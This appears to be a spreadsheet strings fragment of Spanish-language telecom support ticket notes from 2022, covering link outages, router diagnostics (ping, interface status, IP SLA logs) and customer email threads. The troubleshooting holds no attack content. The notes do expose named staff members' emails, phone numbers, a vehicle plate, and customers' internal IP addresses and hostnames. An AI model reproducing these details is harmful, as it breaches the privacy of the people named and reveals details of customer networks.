  <si>
    <t>SE HABLO CON EL CLIENTE MARIO JOVEL QUIEN YA ESTA ENTERADO DE QUE LA VISITA SERA EL DIA DE MAÑANA A LAS 8:00AM
3001225794
COLA:
NOMBRE: A: 0050364201638
NÚMERO: 0050364201638
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: 0050364201638
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 19:29:51</t>
  </si>
  <si>
    <t>F4601723</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 504 25168077 CONTESTA LA SEÑORITA LILIANA CON FIRMA SERVICIO ESTABLE Y OPERATIVO , INDICA QUE FUE PROBLEMA DE ENERGIA **
-ID 3001241583
**</t>
  </si>
  <si>
    <t>F4601734</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE VALIDE TEMA DEL UPS Y DE UNA RAZON POR LA CUAL SE HA ESTADO ALARMADO ENLACE, SE OBSERVA QUE ES POR REINICOS EN CPE POSIBLEMENTE HAYA TAMBIEN PROBLEMAS DE ENERGIA EN SECTOR SIN EMBARGO LO VALIDARA CLIENTE.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 14 DE JUNIO DE 2022 20:02PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE REINCIDENTE PARA CLIENTE "CC_TYT_GT_ATM1637"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO, SOLICITAMOS SU ACOSTUMBRADO APOYO PARA VALIDAR QUE EQUIPOS DE RED EN PUNTO REMOTO CUENTEN CON UPS EN BUEN ESTADO YA QUE SE HA VERIFICADO QUE EQUIPOS DE RED PRESENTAN REINCIDENCIA CON EL TEMA DE REINICIOS, DE ANTEMANO AGRADECEMOS EL APOYO BRINDADO.
TICKET: F4601734
ID: 47503702T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1637
UBICADO EN:  CAJERO 1637_CALLE PRINCIPAL ALDEA CHACTE, SAN LUIS PETEN_BANRURAL CHACTE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>ENA LLAMADA CON PERSONAL DE 5B A LAS 18 HORAS QUE CONTESTO HECTOR, COMENTA QUE EN IZABAL HAN PRESENTADO LOS ULTIMOS DIAS INCIDENTES CON LA ENERGIA EN EL SECTOR QUE EMPRESA ELECTRICA AUN NO HA SOLVENTADO, LOG VIA CIC, ENLACE SE HA ALARMADO VARIAS VECES EL ENLACE.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:02
FIN: HOY, 18:12
DURACIÓN: 9:12
ID DE LLAMADA: 3001214900
INICIO: HOY, 18:53
FIN: HOY, 18:55
DURACIÓN: 1:56
ID DE LLAMADA: 3001222007</t>
  </si>
  <si>
    <t>F4601762</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE RONALD, INDICA QUE REQUIERE ABIERTOS LOS PUERTOS  3389, 2020 Y 8080 EN EL EQUIPO MERAKI, YA QUE SEGUN SE LE INDICÓ ESTE TAMBIEN REALIZA LA FUNCION DE FIREWALL, SE PROCEDE A ESCALAR CON EL SOC PARA REALIZAR LO SOLICITADO POR CLIENTE
3001255381
COLA:
NOMBRE: A: 40509191
NÚMERO: 011 50240509191
DURACIÓN: 0:04:37
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50240509191
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 15/06/2022 08:37:56</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, RONALD, INDICA QUE ESTARA ENVIANDO CAPTURA  DE PANTALLA VIA WHATSAPP AL 42105135  EN DONDE DESDE SU PERSPECTIVA SE LE REFLEJAN LOS PUERTOS 3389, 2020 Y 8080, CERRADOS.
NÚMERO: 011 50240509191
FIN: HOY, 10:09
ID DE LLAMADA: 3001286900</t>
  </si>
  <si>
    <t>F4601820</t>
  </si>
  <si>
    <t>***---  TELEX CONFIRMA SERVICIO YA ARRIBBA POR LO QUE SE LE ENVÍA CORREO SOLICITANDO CIERRE --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 04:47
PARA: BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70022OH :: TICKET CNOC IMBBL004286 :: "FUERA DE SERVICIO"
BUENOS DÍAS ESTIMADO SR. DANIEL.
                GRACIAS POR LA INFORMACIÓN, DE NUESTRO LADO NO SE REALIZÓ CORRECCIÓN DEBIDO A QUE NO SE LOGRÓ UBICAR AL PERSONAL EN SITIO NO SE REALIZARON PRUEBAS DE DESCARTE.
PODRÍA POYARNOS INDICANDO SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 04:32
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70022OH :: TICKET CNOC IMBBL004286 :: "FUERA DE SERVICIO"
ESTIMADOS BUEN DÍA,
EL SERVICIO SE ENCUENTRA RESTABLECIDO, SE TOMARON ACCIONES CORRECTIVAS?
BEST REGARDS | SALUDOS CORDIALES
   	DANIEL BRUGADA HERNÁNDEZ
OPERADOR CIAP GESTION Y SOPORTE
TEL. (55) 5174 5299</t>
  </si>
  <si>
    <t>F4601838</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE KARINA RUIZ MENCIONA QUE AUN NO TIENEN RESPUESTA POR PARTE DE CLIENTE, MENCIONA QUE SE PROCEDA CON EL CIERRE DE TICKET Y SI EL CLIENTE FINAL VUELE A REPORTAR ESTARAN ENVIANDO CORREO
-ID 3001578698</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 OSVALDO MENCIONA QUE CLIENTE FINAL OBSERVA EL SERVICIO CAIDO, INDICA QUE ESTARAN REALIZANDO PRUEBAS CON EL CLIENTE Y LUEGO ESTARAN RESPONDIENDO EL CORREO
-ID 3001312744</t>
  </si>
  <si>
    <t>** EMILIO AGUILAR 52 55 5174 5290 (CLIENTE) INFORMA QUE ELLOS NO TIENEN GESTION DEL EQUIPO ES POR PARTE DEL CLIENTE POR ESTE MOTIVO ESTAN A LA ESPERA DE LA VALIDACION, SOLICITA SE LLAME NUEVAMENTE EN 1 HORA EN CASO NO TENGAMOS LA VALIDACIÓN POR CORREO -*
-*</t>
  </si>
  <si>
    <t>F4601859</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO A LO DICHO EN CRONO ANTERIOR, SE LLAMÓ A LOS TEAMS LEADERS, NO CONTESTAN; SE ESCALA CON ÁNGEL CLAVEL, INDICA QUE NOS APOYARÁ CON SEGUIMIENTO.</t>
  </si>
  <si>
    <t>*F4601859* VISITA PARA MAÑANA MARTES 9 HRS // SE REALIZARAN PRUEBAS DE BERT // 4 HORAS 40 MINUTOS ACUMULADOS EN WO
SE LE ENVIA CORREO A CLIENTE INDICANDO EL HORARIO EN EL QUE SE REALIZARÁN LAS PRUEBAS DE BERT, TAMBIÉN SE LES COMPARTIO LOS DATOS DEL PERSONAL TECNICO
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1132784
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO CONTR0001286888OC || COCA COLA FEMSA DE COSTA RICA S.A
SE COORDINÓ LAS PRUEBAS PARA EL DÍA DE MAÑANA MARTES 05/07 A PARTIR DE LAS 9:00 HRS.
DE SER NECESARIO UNA VISITA EN EL SITIO DE IGUAL FORMA LE COMPARTIMOS DATOS DEL PERSONAL ASIGNADO.
DEYVIS MEMBREÑO BUSTOS      701740011     PLACA:BVZ-884
MICHAEL VALLADARES         7070 1027                          C-7150122
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>***--- SE SOLICITA APOYO AL CNOC VÍA SKYPE --**</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE CON PRUEBAS E INDICANDO SI DESEA UNA VENTANA CON CONSULTORES PARA PODER ENCONTRAR EL INCONVENIENTE EN TIEMPO REAL ##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:05
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; KEVIN.FONSECA@CLARO.COM.GT &lt;KEVIN.FONSEC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EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINED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ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; PEREZ ARIAS, ESTEBAN ANDRES &lt;E.PEREZARIAS@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1132784
BUENAS TARDES ESTIMADOS.
SE HA ESTADO DE NUESTRO LADO VERIFICANDO EL ENLACE A NIVEL LÓGICO Y NO SE OBSERVA INCONVENIENTES. DEBIDO A ESO SE REALIZÓ CON LAS VISITAS TÉCNICAS UNA SATURACIÓN DEL ENLACE Y VERIFICACIÓN DEL ESTADO DE LOS EQUIPOS POR LO CUAL SE OBSERVÓ TODO CORRECTAMENTE. SE INDICO QUE SE QUITARA UN POLICY DEBIDO A QUE LOS CONSULTORES HAN OBSERVADO QUE NO HAY NADA QUE PUEDA PROVOCAR EL INCONVENIENTE.
SE PUEDE PODER COORDINAR UNA VENTANA DONDE SE HAGAN PRUEBAS EN CONJUNTO CON CONSULTORES DE NUESTRO LADO PARA QUE SE COMPARTA MAYORES PRUEBAS DEL ENLACE. QUEDAMOS ATENTOS A SUS COMENTARIOS PARA PODER COORDINAR LA VENTANA .
SE COMPARTE PRUEBAS LOGICAS:
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_FEMSA_CR 10.201.53.206
  PING 10.201.53.206: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.53.206 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/9 MS
INTERFACES:
CC_FEMSA_CR_GUAPILES#SHOW IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.115     UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0.205     10.201.53.206   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         172.19.10.26    YES NVRAM  UP                    UP
LOOPBACK5                  10.99.72.44     YES NVRAM  UP                    UP
SE VERIFICA QUE NO SE TIENE ERRORES NI CRC'S
CC_FEMSA_CR_GUAPILES#SHOW  INTERFACE GIGABITETHERNET0/0
GIGABITETHERNET0/0 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS CN GIGABIT ETHERNET, ADDRESS IS 003A.7D26.2A60 (BIA 003A.7D26.2A60)
  DESCRIPTION: **ENLACE WAN PRINCIPAL**
  MTU 1500 BYTES, BW 100000 KBIT/SEC, DLY 100 USEC,
     RELIABILITY 255/255, TXLOAD 1/255, RXLOAD 1/255
  ENCAPSULATION 802.1Q VIRTUAL LAN, VLAN ID  1., LOOPBACK NOT SET
  KEEPALIVE SET (10 SEC)
  FULL DUPLEX, 100MBPS, MEDIA TYPE IS RJ45
  OUTPUT FLOW-CONTROL IS UNSUPPORTED, INPUT FLOW-CONTROL IS UNSUPPORTED
  ARP TYPE: ARPA, ARP TIMEOUT 04:00:00
  LAST INPUT 00:00:00, OUTPUT 00:00:00, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
  INPUT QUEUE: 0/75/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: CLASS-BASED QUEUEING
  OUTPUT QUEUE: 0/1000/0 (SIZE/MAX TOTAL/DROPS)
  30 SECOND INPUT RATE 18000 BITS/SEC, 9 PACKETS/SEC
  30 SECOND OUTPUT RATE 13000 BITS/SEC, 10 PACKETS/SEC
     8106284 PACKETS INPUT, 3214116680 BYTES, 0 NO BUFFER
     RECEIVED 56462 BROADCASTS (0 IP MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     0 INPUT ERRORS, 0 CRC, 0 FRAME, 0 OVERRUN, 0 IGNORED
     0 WATCHDOG, 9641 MULTICAST, 0 PAUSE INPUT
     7748324 PACKETS OUTPUT, 1956710149 BYTES, 0 UNDERRUNS
     0 OUTPUT ERRORS, 0 COLLISIONS, 2 INTERFACE RESETS
     9641 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     1 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT
CC_FEMSA_CR_GUAPILES#SHOW INTERFACE GIGABITETHERNET0/0.205
GIGABITETHERNET0/0.205 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS CN GIGABIT ETHERNET, ADDRESS IS 003A.7D26.2A60 (BIA 003A.7D26.2A60)
  DESCRIPTION: **ENLACE WAN PRINCIPAL**
  INTERNET ADDRESS IS 10.201.53.206/30
  MTU 1500 BYTES, BW 100000 KBIT/SEC, DLY 100 USEC,
     RELIABILITY 255/255, TXLOAD 1/255, RXLOAD 1/255
  ENCAPSULATION 802.1Q VIRTUAL LAN, VLAN ID  205.
  ARP TYPE: ARPA, ARP TIMEOUT 04:00:00
  KEEPALIVE SET (10 SEC)
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
CC_FEMSA_CR_GUAPILES#SHOW INTERFACE GIGABITETHERNET0/1
GIGABITETHERNET0/1 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS CN GIGABIT ETHERNET, ADDRESS IS 003A.7D26.2A61 (BIA 003A.7D26.2A61)
  DESCRIPTION: RED LAN DEL CLIENTE/_/FEMSA_GUAPILES/PREV:2653487/
  INTERNET ADDRESS IS 172.19.10.26/30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20, OUTPUT 00:00:00, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
  INPUT QUEUE: 0/75/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: FIFO
  OUTPUT QUEUE: 0/40 (SIZE/MAX)
  5 MINUTE INPUT RATE 7000 BITS/SEC, 7 PACKETS/SEC
  5 MINUTE OUTPUT RATE 21000 BITS/SEC, 6 PACKETS/SEC
     3890859 PACKETS INPUT, 3129441467 BYTES, 0 NO BUFFER
     RECEIVED 9711 BROADCASTS (0 IP MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     0 INPUT ERRORS, 0 CRC, 0 FRAME, 0 OVERRUN, 0 IGNORED
     0 WATCHDOG, 9706 MULTICAST, 0 PAUSE INPUT
     4251957 PACKETS OUTPUT, 81041933 BYTES, 0 UNDERRUNS
     0 OUTPUT ERRORS, 0 COLLISIONS, 2 INTERFACE RESETS
     9706 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     1 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT
SE VERIFICA EL EQUIPO ESTA ACTIVO HACE 3 DIAS , DONDE TUVO UN RELOAD EL DIA SABADO
CC_FEMSA_CR_GUAPILES#SHOW VER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FEMSA_CR_GUAPILES UPTIME IS 3 DAYS, 8 HOURS, 28 MINUTES
SYSTEM RETURNED TO ROM BY RELOAD AT 06:49:20 GTM SAT JUN 25 2022
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M3.BIN"
LAST RELOAD TYPE: NORMAL RELOAD
LAST RELOAD REASON: RELOAD COMMAND</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO PARA CONTINUAR SEGUIMIENTO.
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1132784</t>
  </si>
  <si>
    <t>####SE HABLA CON CONTACTO EN EL SITIO EMANUEL GONZALEZ INDICA QUE POSIBLEMENTE SE PUEDA REALIZAR LA VENTANA CON ESTEBAN PEREZ ENCARGADO DEL NOC DEL CLIENTE Y LOS CONSULTORES. SE DEBE ESTAR PENDIENTE DEL CORREO YA QUE EL CLIENTE ENVIARA UNA INVITACION A LA MISMA COLA DE CORREOS##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050683798026
NÚMERO: 0050683798026
INICIO: HOY, 10:22
FIN: HOY, 10:22
DURACIÓN: 0:02
ID DE LLAMADA: 2001908062
RESULTADO: LLAMADA HECHA
NOMBRE: 41668592
NÚMERO: 011 50241668592
INICIO: HOY, 10:21
FIN: HOY, 10:22
DURACIÓN: 0:11
ID DE LLAMADA: 2001908010
RESULTADO: LLAMADA HECHA
NOMBRE: 0050683798026
NÚMERO: 0050683798026
INICIO: HOY, 10:20
FIN: HOY, 10:21
DURACIÓN: 1:01
ID DE LLAMADA: 2001907646</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE CON LAS PRUEBAS REALIZADAS Y AUN SE SIGUE MONITOREANDO PARA OBSERVAR LAS CAIDAS MENCIONADAS POR EL CLIENTE##
SE ADJUNTA DOCUMENTO DE PRUEBAS REALIZADAS QUE SE ENVIA AL CLIENTE
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 10:03
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&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32784
MUY BUENOS DÍAS ESTIMADOS.
DISCULPEN LOS INCONVENIENTES DE SU ENLACE. QUERÍA PODER COMPARTIRLES QUE SE ESTÁ MONITOREANDO LAS CAÍDAS MENCIONADAS Y HEMOS VERIFICADO A NIVEL PROTOCOLO, DE MEDIO Y ERRORES, PERO DE MOMENTO NO OBSERVAMOS LAS CAÍDAS HACIENDO UN TESTEO EN TODA LA RUTA, CON APOYO DE CONSULTORES SE SIGUEN REALIZANDO PRUEBAS A NIVEL LÓGICO. LES COMPORTO LAS PRUEBAS QUE SE HAN REALIZADO A SU ENLACE EN EL DOCUMENTO ADJUNTO PDF.
QUERÍA ADICIONAL PODER REALIZAR UNA VENTANA CON LOS CONSULTORES EN CONJUNTO CON PERSONAL ENCARGADO INTERNO DE SU PARTE PARA PODER REALIZAR LAS PRUEBAS EN TIEMPO REAL. SERÍA QUE ME INDIQUEN EL DÍA Y HORA QUE SE PUEDE REALIZAR ESTA REUNIÓN  PARA PODER PROGRAMARLA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>##SE ENVIA CORREO AL CLIENTE REFERENTE A LA PRUEBA DE BERT REALIZADA Y AL CAMBIO. SE DEBE MANTENER EN OBSERVACION Y VERIFICAR LOGS SI LLEGAN A PRESENTARSE
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 16:25
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEG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GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHON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CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; GONZALEZ, JORGE ALEJANDRO &lt;J.GONZALEZ4@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1132784
BUENAS TARDES ESTIMADOS.
GUSTO DE SALUDARLES, RESPECTO A LAS PRUEBAS DEL DÍA DE HOY SE VERIFICO EL RADWIN DE NUESTRA CENTRAL DEBIDO A QUE SE OBSERVO UNOS ERRORES EL DÍA DE HOY JUSTAMENTE UNA CAÍDA MOMENTÁNEA  COMO SE REPRESENTA EN LAS PRUEBAS QUE SE COLOCARAN EN LA PARTE POSTERIOR DEL CORREO. SE CORRIGIÓ PARÁMETROS DEL RADWIN Y SE AJUSTÓ LA ANTENA.
ESTAREMOS MANTENIÉNDOLO EN OBSERVACIÓN LUEGO DE LAS PRUEBAS Y CERTIFICACIÓN DEL RADIO. SI USTEDES OBSERVAN CAÍDAS LUEGO DE LA CERTIFICACIÓN FAVOR COMENTARNOS.
ESTAREMOS DOCUMENTANDO CUALQUIER EVENTO SOBRE EL TEMA
RADWIN DE LA CENTRAL:
&lt;LPOCCRGUN1W1N01O01EIM1&gt;PING  -C 1000000 -S 1400 -M 50 -B -VPN-INSTANCE  CR_ETX 10.199.78.43
  PING 10.199.78.43: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.....!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.199.78.43 PING STATISTICS ---
    45375 PACKET(S) TRANSMITTED
    45370 PACKET(S) RECEIVED
    0.01% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/54 MS
LOGS REFERENTE A LAS CAIDAS DEL RADWIN CENTRAL
*JUL  5 01:24:45.794: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 01:24:50.794: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 03:12:34.826: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 03:12:34.826: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 03:13:09.826: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 03:13:09.826: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 03:35:25.670: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 03:35:25.670: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 03:36:00.670: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 03:36:00.670: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 04:01:11.574: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 04:01:11.574: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 04:01:46.610: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 04:01:46.610: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 04:46:33.253: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 04:46:38.253: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 04:47:08.253: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 04:47:13.253: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 13:59:29.135: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 14:02:34.267: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 17:00:37.134: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 17:00:42.134: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 17:01:12.178: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 17:01:17.178: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
*JUL  5 18:06:55.130: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY UP -&gt; DOWN
*JUL  5 18:06:55.130: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY UP -&gt; DOWN
*JUL  5 18:07:30.130: %TRACK-6-STATE: 10 IP SLA 10 REACHABILITY DOWN -&gt; UP
*JUL  5 18:07:30.130: %TRACK-6-STATE: 11 IP SLA 11 REACHABILITY DOWN -&gt; UP
CC_FEMSA_CR_CALLEBLANCOS#
SHOW CLOCK
*21:22:33.021 UTC TUE JUL 5 2022
CC_FEMSA_CR_CALLEBLANCOS#</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE INDICANDO LOGRAMOS OBSERVAR LAS CAIDAS Y QUE SE PROCEDERA A ESCALAR CON CONUSLTOR PARA PODER ENCONTRAR LA SOLUCION A SU INCONVENIENTE##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
